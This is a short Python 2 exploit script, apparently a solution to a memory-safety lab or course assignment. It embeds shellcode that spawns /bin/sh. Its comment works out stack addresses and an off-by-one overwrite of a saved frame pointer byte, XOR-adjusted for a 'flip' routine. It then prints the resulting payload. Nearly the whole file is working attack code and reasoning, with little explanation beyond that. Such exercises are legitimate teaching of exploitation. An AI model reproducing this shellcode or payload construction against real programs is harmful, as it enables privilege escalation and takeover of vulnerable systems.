#!/usr/bin/env python2

SHELLCODE = \
    '\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a' + \
    '\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f' + \
    '\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50' + \
    '\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

### YOUR CODE HERE ###
'''
	
	[4] RIP 0xffffd7b4	Address = 0xffffd7b4
	[4] SFP 0xffffd7b0	Address = 0xffffd7b0 value = 0xffffd7xx
	[64] buf 		Address = 0xffffd770


	Logic:
	The shell code seems to exist in envior[4], but which location?
        EGG file in ((char **) environ)[4]  = 0xffffdf9a
	The shell code exist in the following address
	shell address = 0xffffdf9a + 4 = 0xffffdf9e 
	Since the flip function Xor each byte with 0x20 we have to pass xored value so when fliped flip bach to original 
	The xored address 0xdfdfffbe
	What to overwrite sfp's last byte wih? over write with something to point to the buf location
	0x70 ^ 0x20 = 0x50
	
	fill the the first 4 bytes with garbage the second 4 bytes with the xored address of the shellcode and the 56 bytes with garbage and 1 byte of 0x50.

'''
send = 'A' * 4 + '\xbe\xff\xdf\xdf'+ 'b' * 56 + '\x50'
print(send)

